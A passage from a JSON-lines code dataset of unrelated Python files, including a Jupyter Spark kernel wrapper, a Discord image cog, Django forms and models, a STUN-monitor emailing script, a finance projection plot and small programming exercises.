Foreign key fields\n locked_by = validated_data.get('locked_by', None)\n if locked_by is not None:\n locked_by_obj = User.objects.get(pk=locked_by)\n instance.locked_by = locked_by_obj\n \n # Many to many fields\n authors = validated_data.get('authors', None)\n if authors is not None:\n author_objs = User.objects.filter(pk__in=authors)\n instance.authors = author_objs\n \n # Save\n instance.save()\n\n section = parent_data.get('section', None)\n if section is not None:\n section_obj = Section.objects.get(pk=section)\n parent.section = section_obj\n \n parent.save()\n\n return instance\n","sub_path":"server/editor/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"357253269","text":"# Copyright (c) 2015 aggftw@gmail.com\n# Distributed under the terms of the Modified BSD License.\nimport requests\nfrom ipykernel.ipkernel import IPythonKernel\nfrom remotespark.utils.ipythondisplay import IpythonDisplay\n\nimport remotespark.utils.configuration as conf\nfrom remotespark.utils.log import Log\nfrom remotespark.utils.utils import get_connection_string\nfrom .usercommandparser import UserCommandParser\nfrom .codetransformers import *\n\n\nclass SparkKernelBase(IPythonKernel):\n def __init__(self, implementation, implementation_version, language, language_version, language_info,\n kernel_conf_name, session_language, client_name, **kwargs):\n # Required by Jupyter - Override\n self.implementation = implementation\n self.implementation_version = implementation_version\n self.language = language\n self.language_version = language_version\n self.language_info = language_info\n\n # Override\n self.kernel_conf_name = kernel_conf_name\n self.session_language = session_language\n self.client_name = client_name\n\n super(SparkKernelBase, self).__init__(**kwargs)\n\n self._logger = Log(self.client_name)\n self._session_started = False\n self._fatal_error = None\n self._ipython_display = IpythonDisplay()\n\n self.user_command_parser = UserCommandParser()\n\n # Disable warnings for test env in HDI\n requests.packages.urllib3.disable_warnings()\n\n if not kwargs.get(\"testing\", False):\n configuration = self._get_configuration()\n if not configuration:\n # _get_configuration() sets the error for us so we can just return now.\n # The kernel is not in a good state and all do_execute calls will\n # fail with the fatal error.\n return\n (username, password, url) = configuration\n self.connection_string = get_connection_string(url, username, password)\n self._load_magics_extension()\n if conf.use_auto_viz():\n self._register_auto_viz()\n\n def do_execute(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False):\n if self._fatal_error is not None:\n self._repeat_fatal_error()\n\n # Parse command\n subcommand, force, output_var, command = self.user_command_parser.parse_user_command(code)\n\n # Get transformer\n transformer = self._get_code_transformer(subcommand)\n\n # Get instructions\n try:\n code_to_run, error_to_show, begin_action, end_action, deletes_session = \\\n transformer.get_code_to_execute(self._session_started, self.connection_string,\n force, output_var, command)\n except SyntaxError as se:\n self._show_user_error(\"{}\".format(se))\n else:\n # Execute instructions\n if error_to_show is not None:\n self._show_user_error(error_to_show)\n return self._execute_cell(code_to_run, silent, store_history, user_expressions, allow_stdin)\n\n if begin_action == Constants.delete_session_action:\n self._delete_session()\n elif begin_action == Constants.start_session_action:\n self._start_session()\n elif begin_action == Constants.do_nothing_action:\n pass\n else:\n raise ValueError(\"Begin action {} not supported.\".format(begin_action))\n\n res = self._execute_cell(code_to_run, silent, store_history, user_expressions, allow_stdin)\n\n if end_action == Constants.delete_session_action:\n self._delete_session()\n elif end_action == Constants.start_session_action:\n self._start_session()\n elif end_action == Constants.do_nothing_action:\n pass\n else:\n raise ValueError(\"End action {} not supported.\".format(end_action))\n\n if deletes_session:\n self._session_started = False\n\n return res\n\n return self._execute_cell(\"\", silent, store_history, user_expressions, allow_stdin)\n\n def do_shutdown(self, restart):\n # Cleanup\n self._delete_session()\n\n return self._do_shutdown_ipykernel(restart)\n\n @staticmethod\n def _get_code_transformer(subcommand):\n if subcommand == UserCommandParser.run_command:\n return SparkTransformer(subcommand)\n elif subcommand == UserCommandParser.sql_command:\n return SqlTransformer(subcommand)\n elif subcommand == UserCommandParser.hive_command:\n return HiveTransformer(subcommand)\n elif subcommand == UserCommandParser.config_command:\n return ConfigTransformer(subcommand)\n elif subcommand == UserCommandParser.info_command:\n return InfoTransformer(subcommand)\n elif subcommand == UserCommandParser.delete_command:\n return DeleteSessionTransformer(subcommand)\n elif subcommand == UserCommandParser.clean_up_command:\n return CleanUpTransformer(subcommand)\n elif subcommand == UserCommandParser.logs_command:\n return LogsTransformer(subcommand)\n elif subcommand == UserCommandParser.local_command:\n return PythonTransformer(subcommand)\n else:\n return NotSupportedTransformer(subcommand)\n\n def _load_magics_extension(self):\n register_magics_code = \"%load_ext remotespark\"\n self._execute_cell(register_magics_code, True, False, shutdown_if_error=True,\n log_if_error=\"Failed to load the Spark magics library.\")\n self._logger.debug(\"Loaded magics.\")\n\n def _register_auto_viz(self):\n register_auto_viz_code = \"\"\"from remotespark.datawidgets.utils import display_dataframe\nip = get_ipython()\nip.display_formatter.ipython_display_formatter.for_type_by_name('pandas.core.frame', 'DataFrame', display_dataframe)\"\"\"\n self._execute_cell(register_auto_viz_code, True, False, shutdown_if_error=True,\n log_if_error=\"Failed to register auto viz for notebook.\")\n self._logger.debug(\"Registered auto viz.\")\n\n def _start_session(self):\n if not self._session_started:\n self._session_started = True\n\n add_session_code = \"%spark add {} {} {} skip\".format(\n self.client_name, self.session_language, self.connection_string)\n self._execute_cell(add_session_code, True, False, shutdown_if_error=True,\n log_if_error=\"Failed to create a Livy session.\")\n self._logger.debug(\"Added session.\")\n\n def _delete_session(self):\n if self._session_started:\n code = \"%spark cleanup\"\n self._execute_cell_for_user(code, True, False)\n self._session_started = False\n\n def _get_configuration(self):\n \"\"\"Returns (username, password, url). If there is an error (missing configuration),\n returns False.\"\"\"\n try:\n credentials = getattr(conf, 'kernel_' + self.kernel_conf_name + '_credentials')()\n ret = (credentials['username'], credentials['password'], credentials['url'])\n\n # The URL has to be set in the configuration.\n assert(ret[2])\n\n return ret\n except (KeyError, AssertionError):\n message = \"Please set configuration for 'kernel_{}_credentials' to initialize Kernel\".format(\n self.kernel_conf_name)\n self._queue_fatal_error(message)\n return False\n\n def _execute_cell(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False,\n shutdown_if_error=False, log_if_error=None):\n reply_content = self._execute_cell_for_user(code, silent, store_history, user_expressions, allow_stdin)\n\n if shutdown_if_error and reply_content[u\"status\"] == u\"error\":\n error_from_reply = reply_content[u\"evalue\"]\n if log_if_error is not None:\n message = \"{}\\nException details:\\n\\t\\\"{}\\\"\".format(log_if_error, error_from_reply)\n self._abort_with_fatal_error(message)\n\n return reply_content\n\n def _execute_cell_for_user(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False):\n return super(SparkKernelBase, self).do_execute(code, silent, store_history, user_expressions, allow_stdin)\n\n def _do_shutdown_ipykernel(self, restart):\n return super(SparkKernelBase, self).do_shutdown(restart)\n\n def _show_user_error(self, message):\n self._logger.error(message)\n self._ipython_display.send_error(message)\n\n def _queue_fatal_error(self, message):\n \"\"\"Queues up a fatal error to be thrown when the next cell is executed; does not\n raise an error immediately. We use this for errors that happen on kernel startup,\n since IPython crashes if we throw an exception in the __init__ method.\"\"\"\n self._fatal_error = message\n\n def _abort_with_fatal_error(self, message):\n \"\"\"Queues up a fatal error and throws it immediately.\"\"\"\n self._queue_fatal_error(message)\n self._repeat_fatal_error()\n\n def _repeat_fatal_error(self):\n \"\"\"Throws an error that has already been queued.\"\"\"\n error = conf.fatal_error_suggestion().format(self._fatal_error)\n self._logger.error(error)\n self._ipython_display.send_error(error)\n raise ValueError(self._fatal_error)\n","sub_path":"remotespark/wrapperkernel/sparkkernelbase.py","file_name":"sparkkernelbase.py","file_ext":"py","file_size_in_byte":9598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"551821624","text":"import discord\r\nfrom discord.ext import commands\r\nfrom .utils.dataIO import fileIO\r\nfrom .utils.dataIO import dataIO\r\nfrom .utils import checks\r\nimport asyncio\r\nimport textwrap\r\nimport os\r\nimport math\r\nimport aiohttp\r\nfrom copy import copy\r\n\r\ntry:\r\n from PIL import Image, ImageDraw, ImageFont, ImageColor\r\n\r\n pil_available = True\r\nexcept:\r\n pil_available = False\r\n\r\n\r\nclass rip:\r\n \"\"\"rest in pieces\"\"\"\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.drawing_settings = fileIO(\"data/rip/settings.json\", \"load\")\r\n\r\n @commands.command(pass_context=True)\r\n async def rip(self, ctx, user: discord.Member=None):\r\n \"\"\"rip \"\"\"\r\n text = \"Rest in Peace,\\n {}\".format(user.name)\r\n text2 = user.name\r\n result = Image.open('data/rip/stone.jpg').convert('RGBA')\r\n process = Image.new('RGBA', (833, 576), (0, 0, 0))\r\n fnt = ImageFont.truetype('data/rip/animeace.otf', 45)\r\n fnt_sm = ImageFont.truetype('data/rip/animeinept.otf', 40)\r\n d = ImageDraw.Draw(process)\r\n sign = user.name\r\n author_width = fnt_sm.getsize(\"— \" + sign)[0]\r\n d.rectangle([(0, 0), (833, 576)], fill=(0, 0, 0, 0))\r\n d.text((140, 200), text, font=fnt, fill=\"#2f3642\")\r\n #d.rectangle((25, 25), ava)\r\n #d.text((200 - author_width - 25, 65), \"— \" + sign, font=fnt_sm, fill=\"#000000\")\r\n #d.rectangle([(10, 10), (390, 90)], fill=None, outline=(200, 200, 200, 128))\r\n result = Image.alpha_composite(result, process)\r\n result.save('data/rip/temp.png', 'PNG', quality=100)\r\n await self.bot.send_file(ctx.message.channel, 'data/rip/temp.png')\r\n os.remove('data/rip/temp.png')\r\n\r\ndef setup(bot):\r\n # check_folders()\r\n # check_files()\r\n n = rip(bot)\r\n bot.add_cog(n)","sub_path":"rip.py","file_name":"rip.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"647021194","text":"from django import forms\n\nfrom .models import Weeklyschedule, ScheduledTime\n\nclass WeeklyscheduleForm(forms.ModelForm):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(WeeklyscheduleForm, self).__init__(*args, **kwargs)\n\t\tself.fields['sid'].widget.attrs['readonly'] = True\n\tclass Meta:\n\t\tmodel = Weeklyschedule\n\t\tfields = [\n\t\t'id',\n\t\t'sid'\n\t\t]\n\nclass ScheduledTimeForm(forms.Form):\n\tdate = forms.DateField()\n\tstarttime = forms.TimeField()\n\tendtime = forms.TimeField()\n\tnotes = forms.CharField(required=False)\n\nclass ScheduledTimeModelForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = ScheduledTime\n\t\tfields = [\n\t\t'wid',\n\t\t'date',\n\t\t'starttime',\n\t\t'endtime',\n\t\t'notes'\n\t\t]\n\t\n","sub_path":"304env/src/DASHospital/WeeklySchedule/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"407091341","text":"\"\"\"\r\n模拟ZOJ1115\r\nDESCRIPTION:类似水仙花数似的,自定义数字根,将数位相加至一位整数\r\n\"\"\"\r\ndef func(n):\r\n sum = 0\r\n while n != 0:\r\n sum += n % 10\r\n n /= 10\r\n if sum > 9:\r\n return func(sum)\r\n else:\r\n return sum\r\n\r\n\r\nif __name__ == '__main__':\r\n while True:\r\n n = int(input())\r\n if n == 0:\r\n break\r\n print(func(n))\r\n\"\"\"\r\n24\r\n36\r\n0\r\n\r\n6\r\n3\r\n\"\"\"","sub_path":"水题_zoj1115.py","file_name":"水题_zoj1115.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"490226379","text":"#!/usr/bin/python\n\nimport pandas as pd\n\ncountries = pd.read_csv('../../country_names.csv')\ncountries = countries.set_index('country_code')\n\noutf = open('load_disease_burden.py', 'a')\n\noutf.write(\"\\n\")\nfor code in countries.index:\n\toutf.write(\"\\t\\t\\tdisease_burden.\"+code+\" = df.loc[index, '\"+code+\"']\\n\")\n\noutf.write(\"\\t\\t\\t#don't forget to save\\n\")\noutf.write(\"\\t\\t\\tdisease_burden.save()\\n\")\noutf.close()\n","sub_path":"djangos/mysite/disease/management/commands/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"240987652","text":"#!/usr/bin/env python3\n#-*-coding:utf-8-*- \n\nfrom tkinter import *\nimport tkinter.messagebox as messagebox\n\nimport urllib.request \nimport socket \nimport re \nimport sys \nimport os \nimport io\nimport time\nimport pymssql\nimport json\n\nclass Application:\n\n def __init__(self,Root):\n self.root=Root\n def printList():\n items=[]\n for i in listbox.curselection():\n items.append(sUrl[i])\n messagebox.showinfo('Message', '正在下载, %s' % items)\n value=StringVar()\n listbox = Listbox(self.root,listvariable=value,selectmode=EXTENDED)\n download=Button(self.root,text='下载选中',comman=printList)\n listbox.grid(row=1,columnspan =3,sticky=\"nsew\")\n download.grid(row=2,columnspan=3,sticky=\"nsew\")\n sSong=[]\n sUrl=[] \n\n \n def doSearch(keyword):\n regex='(.+?)[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|].+?[|](.+?)[|].+?[|](.+?)[|].+?[|].+?'\n keyword=urllib.parse.quote(keyword)\n page=1\n size=10\n QQ='0'\n url='http://s.music.qq.com/fcgi-bin/music_search_new_platform?t=0&n={2}&aggr=1&cr=1&loginUin={3}&format=json&inCharset=GB2312&outCharset=utf-8¬ice=0&platform=jqminiframe.json&needNewCode=0&p={1}&catZhida=0&remoteplace=sizer.newclient.next_song&w={0}'.format(keyword,page,size,QQ)\n request = urllib.request.Request(url)\n response =urllib.request.urlopen(request)\n response=response.read().decode('utf-8')\n jsonResult=json.loads(response)\n songTotalnum=jsonResult['data']['song']['totalnum']\n nowSize=len(jsonResult['data']['song']['list'])\n for i in range(0,nowSize):\n getSongs(i,jsonResult,regex)\n\n def getSongs(i,jsonResult,regex):\n\n item=jsonResult['data']['song']['list'][i]\n songF=item['f']\n songAlbum=item['albumName_hilight']\n songSinger=item['fsinger']\n songName=item['fsong']\n\n res = re.findall(regex,songF) \n\n print(res)\n fid=res[0][1]\n fimg=res[0][2]\n firc=res[0][0]\n songUrl='http://cc.stream.qqmusic.qq.com/C200{0}.m4a?vkey=3E97AE28D0DE7EE118A4405D75CE205A58047409A2AFB84C3B928377F696B539DBC4B239D0353DD42D5298CEBD0ADC16F53DE99D3EDBA47B&guid=3587763272&fromtag=30'.format(fid)\n\n sSong.append(songName+' - '+songSinger)\n sUrl.append(songUrl)\n value.set(sSong)\n\n def btnSearch_Click():\n if(textKeyword.get().strip()!=''):\n doSearch(textKeyword.get().strip())\n\n lblKeyword=Label(self.root,text='输入关键字')\n textKeyword=Entry(self.root) \n btnSearch=Button(self.root,text='搜索',command=btnSearch_Click) \n # btnSearch=Button(self.root,text='搜索',command=lambda:btnSearch_Click(textKeyword.get().strip()))\n\n lblKeyword.grid(row=0,column=0)\n textKeyword.grid(row=0,column=1)\n btnSearch.grid(row=0,column=2)\n \n\nclass GuiMenu():\n def hello(self):\n pass\n def File(self):\n pass\n def Edit(self):\n pass\n def View(self):\n pass\n def Help(self):\n pass\n \n def __init__(self,Root):\n self.root=Root\n self.menubar=Menu(Root)\n # create a pulldown menu, and add it to the menu bar\n filemenu = Menu(self.menubar, tearoff=0)\n filemenu.add_command(label=\"Open\", command=self.File)\n filemenu.add_command(label=\"New\", command=self.File)\n filemenu.add_command(label=\"Save\", command=self.File)\n filemenu.add_separator()\n filemenu.add_command(label=\"Exit\", command=Root.quit)\n self.menubar.add_cascade(label=\"File\", menu=filemenu)\n # create more pulldown menus\n editmenu = Menu(self.menubar, tearoff=0)\n editmenu.add_command(label=\"Cut\", command=self.Edit)\n editmenu.add_command(label=\"Copy\", command=self.Edit)\n editmenu.add_command(label=\"Paste\", command=self.Edit)\n self.menubar.add_cascade(label=\"Edit\", menu=editmenu)\n helpmenu = Menu(self.menubar,tearoff=0)\n helpmenu.add_command(label=\"About\", command=self.Help)\n self.menubar.add_cascade(label=\"Help\", menu=helpmenu)\n Root.config(menu=self.menubar)\n\n \n \n\ndef main():\n root = Tk()\n root.geometry('600x400')\n root.title('QQmusic')\n GuiMenu(root)\n Application(root)\n mainloop()\n\nif __name__ == '__main__':\n main()","sub_path":"QQmusic/QQmusicNew.py","file_name":"QQmusicNew.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"515027162","text":"#!/usr/bin/env python3\nimport smtplib\nfrom email.mime.text import MIMEText\nimport os\nimport json\nimport argparse\n\ndef parse_command_line():\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('exe_path', action='store', type=str, help='Path to executable file')\n\tparser.add_argument('config_path', action='store', type=str, help='Path to the executable configuration file')\n\tparser.add_argument('result_old_path', action='store', type=str, help='Path to old file with results')\n\tparser.add_argument('result_new_path', action='store', type=str, help='Path to new file with results')\n\tparser.add_argument('error_log_path', action='store', type=str, help='Path to error log')\n\n\tparser.add_argument('from_address', action='store', type=str, help='Mail form which the message will be sent')\n\tparser.add_argument('to_address', action='store', type=str, help='Mail to which the message will be sent')\n\n\targs=parser.parse_args()\n\n\tdata= args.exe_path, args.config_path, args.result_old_path, args.result_new_path, args.error_log_path, args.from_address, args.to_address\n\n\treturn data\n\ndef send_message(message, from_address, to_address):\n\tmsg=initialization_message(message, from_address, to_address)\n\n\ts = smtplib.SMTP('localhost')\n\ts.sendmail(from_address, [to_address], msg.as_string())\n\ts.quit()\n\ndef initialization_message(message, from_address, to_address):\n\tmsg=MIMEText(message,'plain','utf-8')\n\tmsg['Subject'] = 'stun_monitor'\n\tmsg['From'] = from_address\n\tmsg['To'] = to_address\n\n\treturn msg\n\ndef get_str_file(file):\n\ttext = ''\n\tif os.path.exists(file):\n\t\twith open(file) as data:\n\t\t\ttext = data.read()\n\telse:\n\t\treturn False\n\treturn text\n\ndef get_json(file):\n\tdata=''\n\tif os.path.exists(file):\n\t\ttry:\n\t\t\twith open(file) as json_data:\n\t\t\t\tdata = json.load(json_data)\n\t\texcept ValueError:\n\t\t\treturn False\n\telse:\n\t\treturn False\n\treturn data\n\nclass data_analyzer:\n\tdef __init__(self, _executable_file, _config_path, _result_new, _result_old, _error_log):\n\t\tself.__executable_file = _executable_file\n\t\tself.__config_path = _config_path\n\t\tself.__result_new = _result_new\n\t\tself.__result_old = _result_old\n\t\tself.__error_log = _error_log\n\n\t\tif os.path.exists(_result_new):\n\t\t\tos.remove(_result_new)\n\t\tself.__command='./' + _executable_file + ' ' + '--config_path=' + _config_path + \\\n\t\t\t' ' + '--record_path=' + _result_new + ' ' + '2>' + _error_log\n\n\tdef start_data_analysis(self):\n\t\tmessage = ''\n\n\t\tif os.system(self.__command) == 0:\n\t\t\tif os.path.exists(self.__result_old):\n\t\t\t\tmessage=self.__data_analysis__()\n\t\t\tself.__end_of_analysis__()\n\t\telse:\n\t\t\tmessage='Monitor errors log: ' + get_str_file(self.__error_log)\n\t\treturn message\n\n\tdef __end_of_analysis__(self):\n\t\tif os.path.exists(self.__result_old):\n\t\t\tos.remove(self.__result_old)\n\t\tos.rename(result_new,result_old)\n\n\tdef __data_analysis__(self):\n\t\tdata_old = get_json(self.__result_old)\n\t\tdata_new = get_json(self.__result_new)\n\t\tmessage = ''\n\n\t\tif data_old == False or data_old == False:\n\t\t\tmessage = 'data_analysis.py: Could not open ' + self.__result_old\n\t\t\tmessage += ' or ' + self.__result_new\n\t\t\treturn message\n\t\t\t\n\t\tinvalid_servers=''\n\n\t\ttry:\n\t\t\tfor itnew in data_new[\"Servers\"]:\n\t\t\t\tif itnew[\"IsActive\"] == 'No':\n\t\t\t\t\tfor itold in data_old[\"Servers\"]:\n\t\t\t\t\t\tif itnew[\"IP\"] == itold[\"IP\"] and itold[\"IsActive\"] == 'No':\n\t\t\t\t\t\t\tinvalid_servers+=itnew[\"IP\"]+'\\n'\n\n\t\t\tif invalid_servers:\n\t\t\t\tmessage='Non-working servers:\\n'+invalid_servers\n\n\t\texcept KeyError:\n\t\t\tmessage='data_analysis.py: Invalid monitoring result'\n\n\t\treturn message\n\n\ndata = parse_command_line()\nif data:\n\texe_path = data[0]\n\tconfig_path = data[1]\n\tresult_old = data[2]\n\tresult_new = data[3]\n\terror_log = data[4]\n\t\n\tfrom_address = data[5]\n\tto_address = data[6]\n\n\tanalyzer = data_analyzer(exe_path, config_path, result_new, result_old, error_log)\n\tmessage = analyzer.start_data_analysis()\n\n\tif message:\n\t\tsend_message(message, from_address, to_address)\nelse:\n\tprint('script.py: Could not parse command line')","sub_path":"source/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"389887797","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nfrom matplotlib.font_manager import FontProperties\nimport matplotlib.pyplot as plt\nimport copy\nchf = FontProperties(fname=r\"c:\\windows\\fonts\\msjhbd.ttc\", size=14)\n\n# 參數區--------------------\n# 一般\n_每月薪水 = 3\n_每月開銷 = 1 # 不含房租\n_每月房租 = 1\n_每月孝親 = 0\n_退休年齡 = 60\n_年薪月數 = 12\n# 投資\n_投資部位 = 0.7\n_投資年利率 = 5\n_投資資金 = 20\n_投資年紀 = 25\n# 買房\n_買房價格 = 300\n_買房頭期款 = 100\n_買房年紀 = 40\n_房貸利率 = 2.4\n_貸款年數 = 20\n# 系統\n_預測時段 = range(_投資年紀, 90, 1)\n__空時間軸___ = pd.Series(0, index=_預測時段) # 劃出每年金額皆為0的資產線\n\n# 程式區--------------------\n# 複利計算方程式\ndef compound_interest(arr, ratio, return_rate):\n ret = [arr.iloc[0]]\n for v in arr[1:]: # 從第二年開始算\n # 投資金額 * _投資年利率 + 存在帳戶裡不動的錢\n ret.append(ret[-1] * ratio * # 前一年的淨額 * _投資部位=投資金額\n (return_rate/100+1) + # _投資年利率\n ret[-1] * (1 - ratio) + v) # 存在帳戶裡不動的錢\n return pd.Series(ret, _預測時段) # 轉年分\n\n\n# 投資--------------------\n每年淨額 = copy.copy(__空時間軸___)\n每年淨額.loc[_投資年紀] += _投資資金\n每年淨額.loc[:_退休年齡] += _每月薪水 * _年薪月數 # 填滿年薪\n每年淨額 -= (_每月開銷+_每月房租 + _每月孝親)*12 # 填滿開銷\n不作為_財富累積 = 每年淨額.cumsum()\n\n只投資_財富累積 = compound_interest(每年淨額, _投資部位, _投資年利率)\n\n# 買房--------------------\n# 1.每年還款本金\n買房支出 = copy.copy(__空時間軸___)\n買房支出[_買房年紀] = _買房頭期款\n買房支出.loc[_買房年紀:_買房年紀+_貸款年數-1] += (_買房價格 - _買房頭期款) / _貸款年數\n# 欠款\n欠款 = copy.copy(__空時間軸___)\n欠款[_買房年紀] = _買房價格\n欠款 = 欠款.cumsum()\n欠款 = 欠款 - 買房支出.cumsum()\n# 2.每年還款利息\n# 為了結算去年利息,用Shift往後移一年,可計算出每年當年的利息\n利息 = 欠款.shift().fillna(0) * _房貸利率 / 100\n# 3.購屋前房租\n房租年繳 = pd.Series(_每月房租*12, index=_預測時段)\n房租年繳.loc[_買房年紀:] = 0\n只買房_逐年收支 = copy.copy(__空時間軸___)\n只買房_逐年收支.iloc[0] = _投資資金\n只買房_逐年收支.loc[:_退休年齡] += _每月薪水 * 12\n只買房_逐年收支 -= (_每月開銷*12 + 房租年繳 + 利息 + 買房支出)\n只買房_財富累積=只買房_逐年收支.cumsum()\n投資加買房_財富累積 = compound_interest(只買房_逐年收支, _投資部位, _投資年利率)\n# 4.繪圖\nplt.plot(不作為_財富累積, color='black', label='不作為') # 放入各點X,Y,顏色,名字\nplt.plot(只投資_財富累積, color='yellow', label='只投資') # 放入各點X,Y,顏色,名字\nplt.plot(只買房_財富累積, color='red', label='只買房') # 放入各點X,Y,顏色,名字\nplt.plot(投資加買房_財富累積, color='blue', label='投資加買房') # 放入各點X,Y,顏色,名字\n# plt.plot(買房支出, color='yellow', label='InvestOnly') # 放入各點X,Y,顏色,名字\n# plt.plot(欠款, color='yellow', label='InvestOnly') # 放入各點X,Y,顏色,名字\n# plt.plot(利息, color='yellow', label='InvestOnly') # 放入各點X,Y,顏色,名字\nplt.title('比較表', fontproperties=chf)\nplt.xlabel('年齡', fontproperties=chf)\nplt.ylabel('萬元', fontproperties=chf)\nplt.legend(loc='best', prop=chf) # 圖例自動調位置","sub_path":"Python課程/用Python理財_打造小資族選股策略/Brad股價爬蟲/人生財務曲線_Brad.py","file_name":"人生財務曲線_Brad.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"104367632","text":"# Написать функцию которая принимает на вход число от 1 до 100.\r\n# Если число равно 13, функция поднимает исключительную ситуации ValueError\r\n# иначе возвращает введенное число, возведенное в квадрат.\r\n# Далее написать основной код программы. Пользователь вводит число.\r\n# Введенное число передаем параметром в написанную функцию и печатаем результат, который вернула функция.\r\n# Обработать возможность возникновения исключительной ситуации, которая поднимается внутри функции.\r\n\r\nimport random\r\n\r\n\r\ndef my_func(x):\r\n if x not in range(1, 101) or x == 13:\r\n raise ValueError\r\n else:\r\n return x ** 2\r\n\r\n\r\n# print(my_func(13))\r\n\r\ntry:\r\n print(my_func(int(input('Введите число от 1 до 100. Не используйте число 13! >>>'))))\r\nexcept ValueError:\r\n print('Вы ввели число вне диапазона или использовали 13!')\r\n","sub_path":"video_course/lesson_14_4.py","file_name":"lesson_14_4.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36425338","text":"import bisect\n\n\nclass Solution:\n def maxTotalFruits(self, fruits, startPos: int, k: int) -> int:\n n = len(fruits)\n MAX_INT = float(\"inf\")\n pre = [0]\n for i in range(n):\n pre.append(pre[-1] + fruits[i][1])\n res = 0\n for i in range(k + 1):\n left = bisect.bisect_left(fruits, [startPos - i, 0])\n right = bisect.bisect_right(fruits, [startPos + max(k - 2 * i, 0), MAX_INT])\n res = max(res, pre[right] - pre[left])\n left = bisect.bisect_left(fruits, [startPos - max(k - 2 * i, 0), 0])\n right = bisect.bisect_right(fruits, [startPos + i, MAX_INT])\n res = max(res, pre[right] - pre[left])\n return res\n\n\ns = Solution()\nprint(s.maxTotalFruits(\n [[0, 7], [7, 4], [9, 10], [12, 6], [14, 8], [16, 5], [17, 8], [19, 4], [20, 1], [21, 3], [24, 3], [25, 3], [26, 1],\n [28, 10], [30, 9], [31, 6], [32, 1], [37, 5], [40, 9]],\n 21,\n 30))\n# print(s.maxTotalFruits([[200000, 10000]], 200000, 0))\n# print(s.maxTotalFruits([[0, 9], [4, 1], [5, 7], [6, 2], [7, 4], [10, 9]], 5, 4))\n","sub_path":"leetcode/2021/contest/weekly-271/Contest4.py","file_name":"Contest4.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"24960302","text":"import enum\nfrom sqlalchemy import Column, BigInteger, Integer, String, Table,\\\n Enum, DateTime, ForeignKey\nfrom models import Base\n\n\nclass OrgStatus(enum.IntEnum):\n Active = 1\n Locked = 2\n Removed = 3\n\n\nclass OrgType(enum.IntEnum):\n GroupCompany = 0\n Company = 1\n Branch = 2\n Department = 3\n\n\norganizations = Table('cms_organizations', Base.metadata,\n Column('id', BigInteger, primary_key=True),\n Column('code', String(20), nullable=False),\n Column('name', String(256), nullable=False),\n Column('short_name', String(64)),\n Column('org_type', Enum(OrgType), default=OrgType.Department),\n Column('telephone', String(32)),\n Column('mobilephone', String(32)),\n Column('fax', String(32)),\n Column('email', String(64)),\n Column('province', String(32)),\n Column('city', String(32)),\n Column('postcode', String(32)),\n Column('address', String(256)),\n Column('memo', String(512)),\n Column('parent_id', None, ForeignKey('cms_organizations.id',\n ondelete=\"set null\")),\n Column('location_id', None, ForeignKey('cms_locations.id')),\n Column('org_order', Integer, default=1),\n Column('status', Enum(OrgStatus), default=OrgStatus.Active),\n Column('created_date', DateTime, nullable=False),\n Column('last_modifed', DateTime)\n)\n","sub_path":"models/organization.py","file_name":"organization.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"116945230","text":"# 고민해보자...\n\nimport sys\n\nsys.stdin = open('input.txt', 'r')\n\n\ndef calc_process(convert_stack):\n calc_stack = []\n\n try:\n\n while len(convert_stack) != 0:\n popped = convert_stack.pop()\n\n if popped == '*':\n num1 = calc_stack.pop()\n num2 = calc_stack.pop()\n popped = num1 * num2\n\n elif popped == '+':\n num1 = calc_stack.pop()\n num2 = calc_stack.pop()\n popped = num1 + num2\n\n calc_stack.append(popped)\n\n except:\n return None\n\n result = calc_stack[0]\n\n return result\n\n\ndef bracket_process(brackets):\n bracket_stack = []\n convert_stack = []\n\n bracket_stack.append(brackets[0])\n\n prev = brackets[0]\n\n total = 0\n\n for bracket in brackets[1:]:\n\n if len(bracket_stack) == 0:\n\n calc_result = calc_process(convert_stack)\n\n if calc_result:\n total += calc_result\n else:\n return 0\n\n convert_stack = []\n\n # 이후 푸시\n if bracket == '(' or bracket == '[':\n bracket_stack.append(bracket)\n else:\n return 0\n else:\n if bracket == '(' or bracket == '[':\n bracket_stack.append(bracket)\n\n if prev in ['(', '[']:\n convert_stack.append('*')\n elif prev in [')', ']']:\n convert_stack.append('+')\n else:\n popped = bracket_stack.pop()\n\n if popped == '(' and bracket == ')':\n convert_stack.append(2)\n elif popped == '[' and bracket == ']':\n 